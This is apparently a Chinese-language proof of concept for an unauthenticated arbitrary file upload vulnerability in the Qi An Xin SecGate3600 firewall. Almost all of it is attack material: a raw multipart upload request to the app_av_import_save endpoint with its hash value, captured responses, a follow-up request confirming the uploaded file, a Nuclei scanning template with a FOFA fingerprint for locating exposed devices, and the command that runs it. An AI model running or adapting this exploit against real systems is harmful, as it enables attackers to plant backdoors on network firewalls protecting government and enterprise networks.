奇安信网神SecGate3600防火墙app_av_import_save任意文件上传漏洞

POST /?g=app_av_import_save HTTP/1.1Host: x.x.x.xContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfxUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfxContent-Disposition: form-data; name="MAX_FILE_SIZE"

10000000------WebKitFormBoundarykcbkgdfxContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa------WebKitFormBoundarykcbkgdfxContent-Disposition: form-data; name="submit_post"

obj_app_upfile------WebKitFormBoundarykcbkgdfxContent-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445------WebKitFormBoundarykcbkgdfx--

HTTP/1.1 302 FoundSet-Cookie: __s_sessionid__=0s0uco29hd2esn4sqqm732i1h6; path=/Pragma: no-cacheLocation: /?permission_error=1Date: Tue, 26 Dec 2023 10:05:42 GMTExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Content-Type: text/html

File is valid, and was successfully uploaded.Array(    [upfile] => Array        (            [name] => hulnknxa.txt            [type] => text/plain            [tmp_name] => /tmp/phpH9QluX            [error] => 0            [size] => 32        )

)

GET /attachements/xlskxknxa.txt HTTP/1.1Host: xx.xx.xx.xxUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

HTTP/1.1 200 OKDate: Tue, 26 Dec 2023 10:05:42 GMTContent-Type: text/plainAccept-Ranges: bytesEtag: "3338122476"Last-Modified: Tue, 26 Dec 2023 10:05:42 GMTContent-Length: 32

wagletqrkwrddkthtulxsqrphulnknxa

id: qianxin-secworld-secgate3600-app_av_import_save-fileupload

info:  name: 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传漏洞  author: fgz  severity: critical  description: 网神SecGate3600防火墙是一款能够全面应对传统网络攻击和高级威胁的创新型防火墙产品，基于麒麟操作系统与飞腾硬件平台打造，可广泛运用于政府机构、各类企业和组织的业务网络边界，实现网络安全域隔离、精细化访问控制、高效的威胁防护和高级威胁检测等功能。该软件app_av_import_save接口存在文件上传漏洞，未经授权的攻击者可通过此漏洞上传恶意后门文件，从而获取服务器权限。  metadata:    max-request: 1    fofa-query: fid="1Lh1LHi6yfkhiO83I59AYg=="    verified: truevariables:  file_name: "{{to_lower(rand_text_alpha(8))}}"  file_content: "{{to_lower(rand_text_alpha(20))}}"  rboundary: "{{to_lower(rand_text_alpha(26))}}"requests:  - raw:      - |+        POST /?g=app_av_import_save HTTP/1.1        Host: {{Hostname}}        Content-Type: multipart/form-data; boundary=----{{rboundary}}        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36                ------{{rboundary}}        Content-Disposition: form-data; name="MAX_FILE_SIZE"                10000000        ------{{rboundary}}        Content-Disposition: form-data; name="upfile"; filename="{{file_name}}.txt"        Content-Type: text/plain                {{file_content}}        ------{{rboundary}}        Content-Disposition: form-data; name="submit_post"                obj_app_upfile        ------{{rboundary}}        Content-Disposition: form-data; name="__hash__"                0b9d6b1ab7479ab69d9f71b05e0e9445        ------{{rboundary}}--

      - |        GET /attachements/{{file_name}}.txt HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15        Accept-Encoding: gzip

    matchers:      - type: dsl        dsl:          - "status_code_1 == 302 && status_code_2 == 200 && contains(body_2, '{{file_content}}')"

nuclei.exe -t mypoc/奇安信/qianxin-secworld-secgate3600-app_av_import_save-fileupload.yaml -u http://x.x.x.x